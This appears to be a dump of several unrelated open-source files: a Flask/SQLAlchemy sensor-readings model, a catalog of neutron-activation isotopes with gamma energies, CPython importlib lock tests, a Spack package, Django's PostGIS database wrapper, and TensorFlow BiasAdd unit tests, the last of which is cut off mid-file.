        db.UniqueConstraint('user_id', 'name', name='user_id_name_unq'),
    )
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    user_id = db.Column(db.Integer, db.ForeignKey('users.id'), nullable=False)
    name = db.Column(db.String(255), nullable=False)
    # IANA timezone name used to localize reading timestamps for display.
    timezone = db.Column(db.String(255), nullable=False, server_default='UTC')
    sensors = db.relationship(
        'Sensor',
        backref='home',
        lazy='dynamic',
        order_by='Sensor.name',
    )
    def __init__(self, user, name, timezone):
        self.user = user
        self.name = name
        self.timezone = timezone
    def __repr__(self):
        return '<Home id={} name={} timezone={}>' \
            .format(self.id, self.name, self.timezone)
class Sensor(db.Model):
    """A measuring device installed in a home; produces readings."""
    __tablename__ = 'sensors'
    __table_args__ = (
        # A home may not have two sensors with the same name.
        db.UniqueConstraint('home_id', 'name', name='home_id_name_unq'),
    )
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    home_id = db.Column(db.Integer, db.ForeignKey('homes.id'), nullable=False)
    name = db.Column(db.String(255), nullable=False)
    # Public identifier generated by Postgres (pgcrypto) on insert; used by
    # devices to submit readings without exposing the integer id.
    uuid = db.Column(
        psql.UUID,
        nullable=False,
        server_default=db.func.gen_random_uuid(),
        unique=True,
    )
    readings = db.relationship(
        'Reading',
        backref='sensor',
        lazy='dynamic',
        order_by='Reading.timestamp',
    )
    # Per-instance cache for latest_reading(); the class-level None is the
    # "not yet computed" sentinel.
    _latest_reading = None
    def __init__(self, home, name):
        self.home = home
        self.name = name
    def __repr__(self):
        return '<Sensor id={} name={}>'.format(self.id, self.name)
    def latest_reading(self):
        # Query (and cache) the most recent reading; drop the relationship's
        # default ordering first so we can sort descending.
        if not self._latest_reading:
            unordered = self.readings.order_by(None)
            self._latest_reading = unordered.order_by(Reading.timestamp.desc()).first()
        return self._latest_reading
class Reading(db.Model):
    """One measurement (temperatures, humidity, light resistance) from a
    sensor at a point in time."""
    __tablename__ = 'readings'
    __table_args__ = (
        # One reading per sensor per timestamp.
        db.UniqueConstraint(
            'sensor_id', 'timestamp',
            name='sensor_id_timestamp_unq'
        ),
        db.CheckConstraint(
            'humidity >= 0 AND humidity <= 100',
            name='humidity_between_0_and_100',
        ),
        db.CheckConstraint(
            'resistance >= 0',
            name='resistance_must_be_positive',
        ),
    )
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    sensor_id = db.Column(db.Integer, db.ForeignKey('sensors.id'), nullable=False)
    timestamp = db.Column(db.DateTime, index=True, nullable=False)
    # Temperatures are stored in Celsius (see *_f converters below).
    int_temp = db.Column(db.Float, nullable=False, server_default='0.0')
    ext_temp = db.Column(db.Float, nullable=False, index=True)
    humidity = db.Column(db.Float, nullable=False, server_default='0.0')
    # Photoresistor resistance; 0 means "no light measurement".
    resistance = db.Column(db.Float, nullable=False, server_default='0.0')
    def __init__(
        self,
        sensor,
        timestamp=None,
        int_temp=None,
        ext_temp=None,
        humidity=None,
        resistance=None,
    ):
        self.sensor = sensor
        self.timestamp = timestamp
        self.int_temp = int_temp
        self.ext_temp = ext_temp
        self.humidity = humidity
        self.resistance = resistance
    def __repr__(self):
        return '<Reading timestamp={} ext_temp={} humidity={} resistance={}>' \
            .format(
                self.timestamp,
                self.ext_temp,
                self.humidity,
                self.resistance,
            )
    def as_dict(self):
        # JSON-friendly representation; timestamp rendered to the minute
        # with a trailing 'Z' (assumed UTC — TODO confirm against callers).
        return dict(
            timestamp=self.timestamp.strftime('%Y-%m-%dT%H:%MZ'),
            int_temp=self.int_temp,
            ext_temp=self.ext_temp,
            humidity=self.humidity,
            resistance=self.resistance,
        )
    def int_temp_f(self):
        # Celsius -> Fahrenheit.
        return self.int_temp * 9/5 + 32
    def ext_temp_f(self):
        # Celsius -> Fahrenheit.
        return self.ext_temp * 9/5 + 32
    def luminosity(self):
        # Inverse of resistance scaled to 10^6; None when resistance is 0
        # (avoids ZeroDivisionError and marks "no light data").
        if self.resistance > 0:
            return 10**6 / self.resistance
        else:
            return None
    @validates('timestamp')
    @validates_presence
    def validate_timestamp(self, key, value):
        # Presence check only (handled by the decorator).
        return value
    @validates('ext_temp')
    @validates_presence
    def validate_ext_temp(self, key, value):
        # Presence check only (handled by the decorator).
        return value
    @validates('humidity')
    @validates_presence
    def validate_humidity(self, key, value):
        # Must be a number in [0, 100]; non-numeric input raises ValueError.
        try:
            value = float(value)
            if value < 0 or value > 100:
                raise ValueError('humidity must be between 0 and 100')
        except TypeError as e:
            raise ValueError('humidity must be a number') from e
        return value
    @validates('resistance')
    @validates_presence
    def validate_resistance(self, key, value):
        # Negative readings are clamped to zero rather than rejected.
        if value < 0:
            return 0.0
        return value
|
bearing/radwatch-analysis | refs/heads/master | NAA_Isotopes.py | 1 | import numpy as np
class NAA_source(object):
    """A neutron-activation product.

    Constructed with the *target* nuclide's Symbol and mass number A (the
    activation product has mass A + 1), the product's decay constant lam,
    and a dict of gamma-line energies with their branching ratios. Every
    instance is recorded in the class-level ``sources`` registry.
    """

    sources = []  # registry of all instances, in creation order

    def __init__(self, Symbol, A, lam, energies):
        self.Symbol = Symbol
        self.A = A
        self.lam = lam
        self.energies = energies
        # Register this source so callers can iterate over all of them.
        NAA_source.sources.append(self)

    def __repr__(self):
        # The product nucleus has one more neutron than the target: A + 1.
        return '{0}_{1}'.format(self.Symbol, self.A + 1)
# Catalog of activation products. Each NAA_source is constructed with the
# target nuclide's symbol and mass number (product has mass A + 1), the
# product's decay constant [1/s], and gamma-line energies [keV] with their
# branching ratios.
Na_24_energies = {'energy': [1368.626, 2754.007],
                  'branching_ratio':[1, 0.99855]}
Na_24 = NAA_source('Na', 23, 1.284e-5, Na_24_energies)
K_40_energies = {'energy': [1460.82], 'branching_ratio':[0.1066]}
K_40 = NAA_source ('K', 39, 1.761e-17, K_40_energies)
K_42_energies = {'energy': [1524.7],
                 'branching_ratio': [0.18]}
K_42 = NAA_source('K', 41, 1.56e-5, K_42_energies)
Sc_46_energies = {'energy': [889.277, 1120.545],
                  'branching_ratio': [0.99984, 0.99987]}
Sc_46 = NAA_source('Sc', 45, 2.4e-6, Sc_46_energies)
Ca_47_energies = {'energy':[489.23, 807.86, 1297.09],
                  'branching_ratio':[0.062, 0.062, 0.71]}
Ca_47 = NAA_source('Ca', 46, 1.769e-6, Ca_47_energies)
Cr_51_energies = {'energy': [320.1],
                  'branching_ratio': [0.1]}
Cr_51 = NAA_source('Cr', 50, 2.9e-7, Cr_51_energies)
Mn_56_energies = {'energy':[846.771, 1810.772, 2113.123],
                  'branching_ratio':[0.989, 0.272, 0.143]}
Mn_56 = NAA_source('Mn', 55, 7.467e-5, Mn_56_energies)
Fe_59_energies = {'energy': [1099.43, 1291.79],
                  'branching_ratio': [0.565, 0.432]}
Fe_59 = NAA_source('Fe', 58, 1.8e-7, Fe_59_energies)
Co_60_energies = {'energy': [1173.43, 1332.71],
                  'branching_ratio': [0.999735, 0.999856]}
Co_60 = NAA_source('Co', 59, 4.17e-9, Co_60_energies)
Cu_64_energies = {'energy': [1345.84], 'branching_ratio': [0.00473]}
Cu_64 = NAA_source('Cu', 63, 1.516e-5, Cu_64_energies)
Zn_65_energies = {'energy': [1115.86],
                  'branching_ratio': [0.506]}
Zn_65 = NAA_source('Zn', 64, 3.28e-8, Zn_65_energies)
Ga_72_energies = {'energy': [834.01, 629.95, 600.94],
                  'branching_ratio': [0.96, 0.248, 0.0554]}
Ga_72 = NAA_source('Ga', 71, 1.366e-5, Ga_72_energies)
Se_75_energies = {'energy': [121.1155, 136, 264.6576, 279.54, 400.6576],
                  'branching_ratio': [0.172, 0.583, 0.589, 0.2499, 0.1147]}
Se_75 = NAA_source('Se', 74, 6.698e-8, Se_75_energies)
As_76_energies = {'energy': [559.24, 657.25],
                  'branching_ratio': [0.45, 0.052]}
As_76 = NAA_source('As', 75, 7.44e-6, As_76_energies)
Kr_81_energies = {'energy': [275.988], 'branching_ratio': [0.3]}
Kr_81 = NAA_source('Kr', 80, 9.59806e-14, Kr_81_energies)
Br_82_energies = {'energy': [559.49, 619.67, 776.45],
                  'branching_ratio': [0.45, 0.434, 0.835]}
Br_82 = NAA_source('Br', 81, 5.45e-6, Br_82_energies)
Sr_85_energies = {'energy': [514.0067], 'branching_ratio': [0.96]}
Sr_85 = NAA_source('Sr', 84, 1.2373e-7, Sr_85_energies)
Rb_86_energies = {'energy': [1076.96],
                  'branching_ratio': [0.09]}
Rb_86 = NAA_source('Rb', 85, 4.31e-7, Rb_86_energies)
Zr_95_energies = {'energy': [724.2, 759.73], 'branching_ratio': [0.4417, 0.54]}
# Fixed: target mass was 95 (breaking the A = product - 1 convention used by
# every other entry and making repr() read "Zr_96"); target of Zr-95 is Zr-94.
Zr_95 = NAA_source('Zr', 94, 1.253e-7, Zr_95_energies)
Zr_97_energies = {'energy': [743.36], 'branching_ratio': [.93]}
Zr_97 = NAA_source('Zr', 96, 1.139e-5, Zr_97_energies)
Sb_122_energies = {'energy': [564.12, 692.794],
                   'branching_ratio': [0.71, 0.0385]}
Sb_122 = NAA_source('Sb', 121, 2.945e-6, Sb_122_energies)
Sb_124_energies = {'energy': [602.72, 1690.98],
                   'branching_ratio': [0.9826, 0.4779]}
Sb_124 = NAA_source('Sb', 123, 1.33e-7, Sb_124_energies)
Ba_131_energies = {'energy': [123.81, 216.078, 496.47],
                   'branching_ratio': [0.2897, 0.1966, 0.47]}
Ba_131 = NAA_source('Ba', 130, 6.98e-7, Ba_131_energies)
Cs_134_energies = {'energy': [569.48, 604.721, 796.02],
                   'branching_ratio': [0.1538, 0.9762, 0.8553]}
Cs_134 = NAA_source('Cs', 133, 1.06e-8, Cs_134_energies)
Cs_137_energies= {'energy':[661.657], 'branching_ratio': [0.851]}
# NOTE(review): target 'Cs', 136 follows the naming convention, but Cs-136 is
# not a stable target nuclide -- confirm intended production path.
Cs_137 = NAA_source('Cs', 136, 7.307e-10, Cs_137_energies)
Cs_138_energies = {'energy': [1435.795], 'branching_ratio': [.763]}
Cs_138 = NAA_source('Cs', 137, .000347, Cs_138_energies)
La_140_energies = {'energy': [328.86, 487.16, 751.81, 815.96, 925.4, 1596.43,
                              2521.64],
                   'branching_ratio': [0.203, 0.455, 0.0433, 0.2328, 0.069,
                                       0.954, 0.0346]}
La_140 = NAA_source('La', 139, 5.45e-6, La_140_energies)
Ce_141_energies = {'energy': [145.44],
                   'branching_ratio': [0.482]}
Ce_141 = NAA_source('Ce', 140, 2.48e-7, Ce_141_energies)
Eu_152_energies = {'energy': [121.78, 244.7, 344.35, 778.9, 964.1, 1085.9,
                              1112.1, 1408],
                   'branching_ratio': [0.2858, 0.0758, 0.265, 0.12942,
                                       0.14605, 0.10207, 0.13644, 0.21005]}
Eu_152 = NAA_source('Eu', 151, 1.62e-9, Eu_152_energies)
# Fixed: first energy was written "723,81" (decimal-comma typo), which Python
# parsed as TWO energies (723 and 81) against only two branching ratios.
Eu_154_energies = {'energy': [723.81, 1274.65],
                   'branching_ratio': [0.2022, 0.3519]}
Eu_154 = NAA_source('Eu', 153, 2.45e-9, Eu_154_energies)
Dy_165_energies = {'energy': [361.68], 'branching_ratio': [0.0084]}
Dy_165 = NAA_source('Dy', 164, 8.248e-5, Dy_165_energies)
Hf_181_energies = {'energy': [482.182, 133.024, 345.916],
                   'branching_ratio': [.805, .433, .1512]}
Hf_181 = NAA_source('Hf', 180, 1.893e-7, Hf_181_energies)
Au_198_energies = {'energy': [411.803], 'branching_ratio': [0.96]}
Au_198 = NAA_source('Au', 197, 2.9766e-6, Au_198_energies)
Hg_203_energies = {'energy': [279.197], 'branching_ratio': [0.81]}
Hg_203 = NAA_source('Hg', 202, 1.721e-7, Hg_203_energies)
|
tshlabs/tunic | refs/heads/master | test/unit/test_api.py | 1 | # -*- coding: utf-8 -*-
import tunic.api
def test_public_exports():
    """The names exported by tunic.api must exactly match its __all__."""
    public_names = {name for name in dir(tunic.api) if not name.startswith('_')}
    assert public_names == set(tunic.api.__all__), 'Exports and __all__ members should match'
|
Zhongqilong/kbengine | refs/heads/master | kbe/src/lib/python/Lib/test/test_importlib/test_locks.py | 84 | from . import util
frozen_init, source_init = util.import_importlib('importlib')
frozen_bootstrap = frozen_init._bootstrap
source_bootstrap = source_init._bootstrap
import sys
import time
import unittest
import weakref
from test import support
try:
import threading
except ImportError:
threading = None
else:
from test import lock_tests
if threading is not None:
    class ModuleLockAsRLockTests:
        # Runs the generic RLock test suite against importlib's _ModuleLock.
        locktype = classmethod(lambda cls: cls.LockType("some_lock"))
        # Setting an inherited test attribute to None removes that test:
        # _is_owned() unsupported
        test__is_owned = None
        # acquire(blocking=False) unsupported
        test_try_acquire = None
        test_try_acquire_contended = None
        # `with` unsupported
        test_with = None
        # acquire(timeout=...) unsupported
        test_timeout = None
        # _release_save() unsupported
        test_release_save_unacquired = None
    # Exercise both the frozen and the source versions of the bootstrap.
    class Frozen_ModuleLockAsRLockTests(ModuleLockAsRLockTests, lock_tests.RLockTests):
        LockType = frozen_bootstrap._ModuleLock
    class Source_ModuleLockAsRLockTests(ModuleLockAsRLockTests, lock_tests.RLockTests):
        LockType = source_bootstrap._ModuleLock
else:
    # No threading available: provide empty placeholders so test discovery
    # still finds the class names.
    class Frozen_ModuleLockAsRLockTests(unittest.TestCase):
        pass
    class Source_ModuleLockAsRLockTests(unittest.TestCase):
        pass
class DeadlockAvoidanceTests:
    """Check that importlib's module locks detect circular-wait deadlocks."""
    def setUp(self):
        # Shrink the GIL switch interval so thread interleavings are
        # exercised aggressively; restored in tearDown.
        try:
            self.old_switchinterval = sys.getswitchinterval()
            sys.setswitchinterval(0.000001)
        except AttributeError:
            self.old_switchinterval = None
    def tearDown(self):
        if self.old_switchinterval is not None:
            sys.setswitchinterval(self.old_switchinterval)
    def run_deadlock_avoidance_test(self, create_deadlock):
        # Build a ring of NLOCKS locks; each thread acquires lock i then
        # lock i+1. With NTHREADS == NLOCKS the ring closes and a circular
        # wait (deadlock) is possible; with one fewer thread it is not.
        NLOCKS = 10
        locks = [self.LockType(str(i)) for i in range(NLOCKS)]
        pairs = [(locks[i], locks[(i+1)%NLOCKS]) for i in range(NLOCKS)]
        if create_deadlock:
            NTHREADS = NLOCKS
        else:
            NTHREADS = NLOCKS - 1
        barrier = threading.Barrier(NTHREADS)
        results = []
        def _acquire(lock):
            """Try to acquire the lock. Return True on success, False on deadlock."""
            try:
                lock.acquire()
            except self.DeadlockError:
                return False
            else:
                return True
        def f():
            a, b = pairs.pop()
            ra = _acquire(a)
            # Wait until every thread holds its first lock before anyone
            # attempts its second -- this forces the circular-wait scenario.
            barrier.wait()
            rb = _acquire(b)
            results.append((ra, rb))
            if rb:
                b.release()
            if ra:
                a.release()
        lock_tests.Bunch(f, NTHREADS).wait_for_finished()
        self.assertEqual(len(results), NTHREADS)
        return results
    def test_deadlock(self):
        results = self.run_deadlock_avoidance_test(True)
        # At least one of the threads detected a potential deadlock on its
        # second acquire() call.  It may be several of them, because the
        # deadlock avoidance mechanism is conservative.
        nb_deadlocks = results.count((True, False))
        self.assertGreaterEqual(nb_deadlocks, 1)
        self.assertEqual(results.count((True, True)), len(results) - nb_deadlocks)
    def test_no_deadlock(self):
        # With the ring not closed, every acquisition must succeed.
        results = self.run_deadlock_avoidance_test(False)
        self.assertEqual(results.count((True, False)), 0)
        self.assertEqual(results.count((True, True)), len(results))
# Run the deadlock-avoidance suite against both bootstrap variants.
@unittest.skipUnless(threading, "threads needed for this test")
class Frozen_DeadlockAvoidanceTests(DeadlockAvoidanceTests, unittest.TestCase):
    LockType = frozen_bootstrap._ModuleLock
    DeadlockError = frozen_bootstrap._DeadlockError
@unittest.skipUnless(threading, "threads needed for this test")
class Source_DeadlockAvoidanceTests(DeadlockAvoidanceTests, unittest.TestCase):
    LockType = source_bootstrap._ModuleLock
    DeadlockError = source_bootstrap._DeadlockError
class LifetimeTests:
    """Check that module locks are garbage-collected when unreferenced."""
    def test_lock_lifetime(self):
        name = "xyzzy"
        self.assertNotIn(name, self.bootstrap._module_locks)
        lock = self.bootstrap._get_module_lock(name)
        self.assertIn(name, self.bootstrap._module_locks)
        # Dropping the last strong reference should remove the registry
        # entry and let the lock be collected (verified via the weakref).
        wr = weakref.ref(lock)
        del lock
        support.gc_collect()
        self.assertNotIn(name, self.bootstrap._module_locks)
        self.assertIsNone(wr())
    def test_all_locks(self):
        # After collection, no module locks should linger in the registry.
        support.gc_collect()
        self.assertEqual(0, len(self.bootstrap._module_locks),
                         self.bootstrap._module_locks)
# Run the lifetime suite against both bootstrap variants.
class Frozen_LifetimeTests(LifetimeTests, unittest.TestCase):
    bootstrap = frozen_bootstrap
class Source_LifetimeTests(LifetimeTests, unittest.TestCase):
    bootstrap = source_bootstrap
@support.reap_threads
def test_main():
    """Run every lock test case, reaping leftover threads afterwards."""
    test_cases = (
        Frozen_ModuleLockAsRLockTests,
        Source_ModuleLockAsRLockTests,
        Frozen_DeadlockAvoidanceTests,
        Source_DeadlockAvoidanceTests,
        Frozen_LifetimeTests,
        Source_LifetimeTests,
    )
    support.run_unittest(*test_cases)


if __name__ == '__main__':
    test_main()
|
rspavel/spack | refs/heads/develop | var/spack/repos/builtin/packages/miniqmc/package.py | 3 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Miniqmc(CMakePackage):
    """A simplified real space QMC code for algorithm development,
    performance portability testing, and computer science experiments
    """

    homepage = "https://github.com/QMCPACK/miniqmc"
    url = "https://github.com/QMCPACK/miniqmc/archive/0.2.0.tar.gz"

    version('0.4.0', sha256='41ddb5de6dcc85404344c80dc7538aedf5e1f1eb0f2a67ebac069209f7dd11e4')
    version('0.3.0', sha256='3ba494ba1055df91e157cb426d1fbe4192aa3f04b019277d9e571d057664d5a9')
    version('0.2.0', sha256='cdf6fc6df6ccc1e034c62f937c040bfd6a4e65a0974b95f6884edd004ae36ee4')

    tags = ['proxy-app', 'ecp-proxy-app']

    depends_on('mpi')
    depends_on('lapack')

    def cmake_args(self):
        # Build with the MPI compiler wrappers from the active spec.
        mpi = self.spec['mpi']
        return [
            '-DCMAKE_CXX_COMPILER=%s' % mpi.mpicxx,
            '-DCMAKE_C_COMPILER=%s' % mpi.mpicc,
        ]

    def install(self, spec, prefix):
        # The build products live in the out-of-source build directory.
        build_dir = '../spack-build'
        install_tree(join_path(build_dir, 'bin'), prefix.bin)
        install_tree(join_path(build_dir, 'lib'), prefix.lib)
|
sephii/django | refs/heads/master | django/contrib/gis/db/backends/postgis/base.py | 5 | from django.conf import settings
from django.db.backends import NO_DB_ALIAS
from django.db.backends.postgresql_psycopg2.base import (
DatabaseWrapper as Psycopg2DatabaseWrapper,
DatabaseFeatures as Psycopg2DatabaseFeatures
)
from django.contrib.gis.db.backends.base import BaseSpatialFeatures
from django.contrib.gis.db.backends.postgis.creation import PostGISCreation
from django.contrib.gis.db.backends.postgis.introspection import PostGISIntrospection
from django.contrib.gis.db.backends.postgis.operations import PostGISOperations
from django.contrib.gis.db.backends.postgis.schema import PostGISSchemaEditor
from django.utils.functional import cached_property
class DatabaseFeatures(BaseSpatialFeatures, Psycopg2DatabaseFeatures):
    # Capability flags for the PostGIS backend on top of the stock
    # psycopg2 feature set.
    supports_3d_functions = True
    supports_left_right_lookups = True
class DatabaseWrapper(Psycopg2DatabaseWrapper):
    """PostgreSQL database wrapper with GIS (PostGIS) support wired in."""
    SchemaEditorClass = PostGISSchemaEditor

    def __init__(self, *args, **kwargs):
        super(DatabaseWrapper, self).__init__(*args, **kwargs)
        # Skip the GIS machinery for the special no-database connection
        # alias (used e.g. to create/drop databases).
        if kwargs.get('alias', '') != NO_DB_ALIAS:
            self.features = DatabaseFeatures(self)
            self.creation = PostGISCreation(self)
            self.ops = PostGISOperations(self)
            self.introspection = PostGISIntrospection(self)

    @cached_property
    def template_postgis(self):
        # Name of the legacy PostGIS template database (PostGIS 1.x style),
        # or None if it does not exist on the server.
        template_postgis = getattr(settings, 'POSTGIS_TEMPLATE', 'template_postgis')
        with self._nodb_connection.cursor() as cursor:
            cursor.execute('SELECT 1 FROM pg_database WHERE datname = %s LIMIT 1;', (template_postgis,))
            if cursor.fetchone():
                return template_postgis
        return None

    def prepare_database(self):
        super(DatabaseWrapper, self).prepare_database()
        if self.template_postgis is None:
            # Check that postgis extension is installed on PostGIS >= 2
            with self.cursor() as cursor:
                cursor.execute("CREATE EXTENSION IF NOT EXISTS postgis")
|
alsrgv/tensorflow | refs/heads/master | tensorflow/python/kernel_tests/bias_op_test.py | 6 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for BiasAdd."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import nn_ops
import tensorflow.python.ops.nn_grad # pylint: disable=unused-import
from tensorflow.python.platform import test
class BiasAddTest(test.TestCase):
  """Tests nn_ops.bias_add (values and gradients) against a NumPy reference."""

  def _npBias(self, inputs, bias):
    """NumPy reference: broadcast-add `bias` along the last axis of `inputs`."""
    assert len(bias.shape) == 1
    assert inputs.shape[-1] == bias.shape[0]
    return inputs + bias.reshape(([1] * (len(inputs.shape) - 1)) +
                                 [bias.shape[0]])

  def testNpBias(self):
    """Sanity-check the NumPy reference implementation itself."""
    self.assertAllClose(
        np.array([[11, 22, 33], [41, 52, 63]]),
        self._npBias(
            np.array([[10, 20, 30], [40, 50, 60]]), np.array([1, 2, 3])))

  def _testBias(self, np_inputs, np_bias, use_gpu=False):
    """Compare bias_add in the default NHWC layout against the reference."""
    np_val = self._npBias(np_inputs, np_bias)
    with self.cached_session(use_gpu=use_gpu):
      tf_val = nn_ops.bias_add(np_inputs, np_bias).eval()
    self.assertAllCloseAccordingToType(np_val, tf_val)

  def _AtLeast3d(self, np_value):
    # fill the input value to at least 3-dimension
    if np_value.ndim < 3:
      return np.reshape(np_value, (1,) * (3 - np_value.ndim) + np_value.shape)
    return np_value

  def _NHWCToNCHW(self, np_value):
    """Convert a channels-last array to channels-first layout."""
    # fill the input value to at least 3-dimension
    np_value = self._AtLeast3d(np_value)
    # move the last dimension to second
    np_dim = list(range(np_value.ndim))
    np_dim_new = list(np_dim[0:1]) + list(np_dim[-1:]) + list(np_dim[1:-1])
    return np.transpose(np_value, np_dim_new)

  def _NCHWToNHWC(self, np_value):
    """Convert a channels-first array back to channels-last layout."""
    assert len(np_value.shape) >= 3
    np_dim = list(range(np_value.ndim))
    # move the second dimension to the last
    np_dim_new = list(np_dim[0:1]) + list(np_dim[2:]) + list(np_dim[1:2])
    return np.transpose(np_value, np_dim_new)

  def _testBiasNCHW(self, np_inputs, np_bias, use_gpu):
    """Compare bias_add with data_format="NCHW" against the NHWC reference."""
    np_val = self._npBias(np_inputs, np_bias)
    np_inputs = self._NHWCToNCHW(np_inputs)
    with self.cached_session(use_gpu=use_gpu):
      tf_val = nn_ops.bias_add(np_inputs, np_bias, data_format="NCHW").eval()
    tf_val = self._NCHWToNHWC(tf_val)
    self.assertAllCloseAccordingToType(self._AtLeast3d(np_val), tf_val)

  def _testAll(self, np_inputs, np_bias):
    """Run both layouts on CPU, and on GPU for float types."""
    self._testBias(np_inputs, np_bias, use_gpu=False)
    self._testBiasNCHW(np_inputs, np_bias, use_gpu=False)
    if np_inputs.dtype in [np.float16, np.float32, np.float64]:
      self._testBias(np_inputs, np_bias, use_gpu=True)
      self._testBiasNCHW(np_inputs, np_bias, use_gpu=True)

  @test_util.run_deprecated_v1
  def testInputDims(self):
    """bias_add rejects inputs with fewer than 2 dimensions."""
    with self.assertRaises(ValueError):
      nn_ops.bias_add([1, 2], [1])

  @test_util.run_deprecated_v1
  def testBiasVec(self):
    """bias_add rejects a bias that is not 1-D."""
    with self.assertRaises(ValueError):
      nn_ops.bias_add(
          array_ops.reshape(
              [1, 2], shape=[1, 2]),
          array_ops.reshape(
              [1, 2], shape=[1, 2]))

  @test_util.run_deprecated_v1
  def testBiasInputsMatch(self):
    """bias_add rejects a bias whose length mismatches the last input dim."""
    with self.assertRaises(ValueError):
      nn_ops.bias_add(
          array_ops.reshape(
              [1, 2], shape=[1, 2]),
          array_ops.reshape(
              [1], shape=[1]))

  @test_util.run_deprecated_v1
  def testIntTypes(self):
    for t in [np.int8, np.int16, np.int32, np.int64]:
      self._testAll(
          np.array([[10, 20, 30], [40, 50, 60]]).astype(t),
          np.array([1, 2, 3]).astype(t))

  @test_util.run_deprecated_v1
  def testFloatTypes(self):
    for t in [np.float16, np.float32, np.float64]:
      self._testAll(
          np.random.rand(4, 3, 3).astype(t), np.random.rand(3).astype(t))

  @test_util.run_deprecated_v1
  def test4DFloatTypes(self):
    # Includes large batch / large channel shapes to hit different kernels.
    for t in [np.float16, np.float32, np.float64]:
      self._testAll(
          np.random.rand(4, 3, 2, 3).astype(t),
          np.random.rand(3).astype(t))
      self._testAll(
          np.random.rand(2048, 4, 4, 4).astype(t),
          np.random.rand(4).astype(t))
      self._testAll(
          np.random.rand(4, 4, 4, 2048).astype(t),
          np.random.rand(2048).astype(t))

  @test_util.run_deprecated_v1
  def test5DFloatTypes(self):
    for t in [np.float16, np.float32, np.float64]:
      self._testAll(
          np.random.rand(4, 3, 2, 3, 4).astype(t),
          np.random.rand(4).astype(t))

  def _testGradient(self, np_input, bias, dtype, data_format, use_gpu):
    """Check theoretical vs. numerical jacobians of bias_add and its grad."""
    with self.cached_session(use_gpu=use_gpu):
      if data_format == "NCHW":
        np_input = self._NHWCToNCHW(np_input)
      input_tensor = constant_op.constant(
          np_input, shape=np_input.shape, dtype=dtype)
      bias_tensor = constant_op.constant(bias, shape=bias.shape, dtype=dtype)
      output_tensor = nn_ops.bias_add(
          input_tensor, bias_tensor, data_format=data_format)
      tensor_jacob_t, tensor_jacob_n = gradient_checker.compute_gradient(
          input_tensor, np_input.shape, output_tensor, np_input.shape)
      bias_jacob_t, bias_jacob_n = gradient_checker.compute_gradient(
          bias_tensor, bias.shape, output_tensor, np_input.shape)
      # Test gradient of BiasAddGrad
      bias_add_grad = gradients_impl.gradients(
          nn_ops.l2_loss(output_tensor), bias_tensor)[0]
      grad_jacob_t, grad_jacob_n = gradient_checker.compute_gradient(
          output_tensor, np_input.shape, bias_add_grad, bias.shape)
      if dtype == np.float16:
        # Compare fp16 theoretical gradients to fp32 numerical gradients,
        # since fp16 numerical gradients are too imprecise unless great
        # care is taken with choosing the inputs and the delta. This is
        # a weaker check (in particular, it does not test the op itself,
        # only its gradient), but it's much better than nothing.
        input_tensor = constant_op.constant(
            np_input, shape=np_input.shape, dtype=np.float32)
        bias_tensor = constant_op.constant(
            bias, shape=bias.shape, dtype=np.float32)
        output_tensor = nn_ops.bias_add(
            input_tensor, bias_tensor, data_format=data_format)
        _, tensor_jacob_n = gradient_checker.compute_gradient(input_tensor,
                                                              np_input.shape,
                                                              output_tensor,
                                                              np_input.shape)
        _, bias_jacob_n = gradient_checker.compute_gradient(bias_tensor,
                                                            bias.shape,
                                                            output_tensor,
                                                            np_input.shape)
        bias_add_grad = gradients_impl.gradients(
            nn_ops.l2_loss(output_tensor), bias_tensor)[0]
        _, grad_jacob_n = gradient_checker.compute_gradient(output_tensor,
                                                            np_input.shape,
                                                            bias_add_grad,
                                                            bias.shape)
      # Looser tolerance for lower-precision dtypes.
      threshold = 5e-3
      if dtype == dtypes.float64:
        threshold = 1e-10
      self.assertAllClose(tensor_jacob_t, tensor_jacob_n, threshold, threshold)
      self.assertAllClose(bias_jacob_t, bias_jacob_n, threshold, threshold)
      self.assertAllClose(grad_jacob_t, grad_jacob_n, threshold, threshold)

  @test_util.run_deprecated_v1
  def testGradientTensor2D(self):
    for (data_format, use_gpu) in ("NHWC", False), ("NHWC", True):
      for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
        np_input = np.array(
            [1.0, 2.0, 3.0, 4.0, 5.0, 6.0],
            dtype=dtype.as_numpy_dtype).reshape(3, 2)
        bias = np.array([1.3, 2.4], dtype=dtype.as_numpy_dtype)
        self._testGradient(np_input, bias, dtype, data_format, use_gpu)

  @test_util.run_deprecated_v1
  def testGradientTensor3D(self):
    for (data_format, use_gpu) in [("NHWC", False), ("NHWC", True),
                                   ("NCHW", False), ("NCHW", True)]:
      for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
        np_input = np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0],
                            dtype=dtype.as_numpy_dtype).reshape(1, 3, 2)
        bias = np.array([1.3, 2.4], dtype=dtype.as_numpy_dtype)
        self._testGradient(np_input, bias, dtype, data_format, use_gpu)

  @test_util.run_deprecated_v1
  def testGradientTensor4D(self):
    for (data_format, use_gpu) in [("NHWC", False)]:
      for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
        np_input = np.arange(
            1.0, 49.0, dtype=dtype.as_numpy_dtype).reshape(
                [2, 3, 4, 2]).astype(np.float32)
        bias = np.array([1.3, 2.4], dtype=dtype.as_numpy_dtype)
        self._testGradient(np_input, bias, dtype, data_format, use_gpu)
        np_input = np.arange(
            1.0, 513.0, dtype=dtype.as_numpy_dtype).reshape(
